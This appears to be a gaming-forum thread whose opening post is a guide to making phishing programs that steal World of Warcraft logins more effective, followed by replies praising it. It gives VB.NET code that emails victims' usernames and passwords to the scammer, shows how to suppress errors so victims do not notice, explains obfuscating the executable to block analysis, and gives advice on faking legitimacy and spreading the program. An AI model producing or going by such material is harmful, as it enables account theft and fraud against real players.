[GUIDE] Improving Phishing Programs

[Y R U A NUB ?]

Well, to start I've seen the forums get really FLOODED with these scamming programs of all kinds. Zeroi9 has been a really awesome contributor when it comes to this kind of scams. (I taught him Visual Basic by the way, and made a bunch of stuff for his programs, I don't really mind getting no credits since I'm not active but yeah). Anyway, I was going to go through a few things here since I know for a fact that these programs won't die... :yuck:

- Obfuscating your programs (making them "un-decompilable")
- Improving your programs and making them look legit
- Advertising
- Last words

Let's get this started.

[PART #1 - Obfuscating]
A few weeks ago I was browsing through MMOwned, and Youtube to find some of the most common scamming programs & guides. I saw about 4 Visual Basic project files that was shared with people so that they could create their own programs. What I noticed was.. they're not obfuscated :O! So, what I did was using a program, I won't tell you what program because that would create pure chaos, and I obtained the login details of numerous of programs. It's like scamming a scammer, how cool is that. Lol, just kidding. I'll help you prevent this. What you do is, download .NET reactor on www.EZIRIZ.com ...To Be One Step Ahead. It's trial, and shows a little box before opening the program when it's finished. (Might wanna find a serial or something, but warez is not allowed here) However, it's protection at it's best :P

Open up your .NET reactor, and you will see:



Now, this is quite simple. Press "open" on main assembly, and open up your scamming program .exe file. On the "quick settings", tick:

Application
Necrobit
Obfuscation

Now that's done. Alright, now to save this. Press "Protect" at the right side of your .NET reactor. Wait for it to load, and then a new folder will appear in the scamming programs folder, and in that folder, *deep breath*, the secured (obfuscated) program has appeared. It's un-decompilable. Have fun.

[PART #2 - Improving]
From what I've seen, some programs have a pretty lame design, doesn't look legit or professional at all, and the mail body is very very messy. As for the mail body, use the

vbCrLf

function between each piece of account information. Example:

Code:

mail.Body = "Account Name:" + TextBox1.Text + vbCrLf + "Password:" + vbCrLf + TextBox2.Text

So what's the purpose of this? Well the, "vbCrLf" function jumps down a line, which does:

Account Name:
Password:

Instead of,

Account Name: Password:

Doesn't that make stuff much more simple? Now for some design and other improvement.

What would happen if G-Mail had problems with their SMTP? Well, you would run on an exception, and it would probably end up that the victim would get to know that it's a scam. How do we prevent it? Like this:

Here's the common mail code people use.

Code:

    Dim mail As New System.Net.Mail.MailMessage()
                Dim SmtpServer As New SmtpClient
                SmtpServer.Credentials = New Net.NetworkCredential("", "")
                SmtpServer.Port = 587
                SmtpServer.Host = "smtp.gmail.com"
                SmtpServer.EnableSsl = True
                mail.To.Add("")
                mail.From = 
                mail.Subject = 
                mail.Body = 
                SmtpServer.Send(mail)

Now, what we want to do is to do something else than output an error message if it runs on an exception. Do this:

Code:

 
   Try
    Dim mail As New System.Net.Mail.MailMessage()
                Dim SmtpServer As New SmtpClient
                SmtpServer.Credentials = New Net.NetworkCredential("", "")
                SmtpServer.Port = 587
                SmtpServer.Host = "smtp.gmail.com"
                SmtpServer.EnableSsl = True
                mail.To.Add("")
                mail.From = 
                mail.Subject = 
                mail.Body = 
                SmtpServer.Send(mail)
Catch exception As Exception
                MsgBox("Something went wrong. Please try again a little later.")
            End Try

Now, if the SMTP isn't working (or can also be caused by wrong e-mail details), it will just show a message box that says "Something went wrong. Please try again a little later." You can edit the message to what pleases you, and even do another function such as "Me.Close()" which closes the program, but this works just fine.

As for form design, I will show a real bad example. This is the "Instant 80 Multi-Suite Hack... scam".



Is it just me, or does it look really poor? Yes it does. This is actually how it looks when you start the program. It has a plain black background, and then some sheet on it. We still can make it look decent. Go to the form settings, then "Back Color", press the "Web" tab, and choose transparent. The result would be:



Looks better, doesn't it? Alright, there's a bunch of other ugly things I could mention, but since design doesn't really has to do with scamming, I won't go through that much.


[PART #3 - Advertising]
Now that we've got a decent program, it's time to spread your program. Be professional and legit. Make yourself a Youtube video. Go to all WoW communities you can find (well not MMOwned), and spread the word.
Also a few tips are to make it seem like a lot of work is put into this hack. Write like really geeky things, and the victims won't really understand and go "well, they know best". Things such as:

Credits for CaRtW0man34 for the algorithms, and ElKo for hosting the reverser engine.

Just builds up the trust a little, if you know what I mean.

[Last Words]
If you want me to help you, or even make programs for you, add me on "[email protected]", and offer me something in return.
Oh, and people, you don't have to use gmail, you just need the smtp for any mail service and you can use that too. Don't confuse yourself over this.

GLHF. Rep and comments - Massivly appreciated

[Y R U A NUB ?]

I'm disappointed. No replies...

[Jon Lajoie]

it takes a while nowadays for em to come in...anyways....good guide. , +rep from to to you for evah
edit:shouldnt this be in guides

[Y R U A NUB ?]

it takes a while nowadays for em to come in...anyways....good guide. , +rep from to to you for evah
edit:shouldnt this be in guides

Thanks for rep. Uhmm.. don't know about the sections, but personally I think it fits quite fine here :P

[Y R U A NUB ?]

wtfb00mp

[Y R U A NUB ?]

Seriously.... I put effort into this, people view it but don't even leave a comment nowadays. I'm sure this is helpful for people, but errr, they ignore it.

[wowmania]

Thank you for the undecompilable trick +rep

[Y R U A NUB ?]

Thank you for the undecompilable trick +rep

Lmao, thanks for reply and rep (even tho I haven't got any yet xD) <33 Hope it helps.

[Imbahamut]

Well written, the bit about obusfacting was quite interesenting -> +rep

[Y R U A NUB ?]

Well written, the bit about obusfacting was quite interesenting -> +rep

Thanks a bunch. Yeah, trust me, it's really helpful. So far I've managed to de-compile a lot of programs that didn't come from Zeroi9, as he obfuscated his programs.. yeah. Just a headsup to everyone.

[samuel93]

+Rep for effort but im so crap on Pc's i couldnt phish to save my life

[Exp]

U R OP ;D great guide

[Y R U A NUB ?]

Thanks guys Hope it helps.

[maxiboy]

Thanks for the scam man

[Y R U A NUB ?]

Thanks for the scam man

Niema problemzka